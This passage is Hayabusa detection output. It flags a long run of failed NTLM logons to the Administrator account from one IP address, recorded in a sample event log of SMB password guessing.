AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: 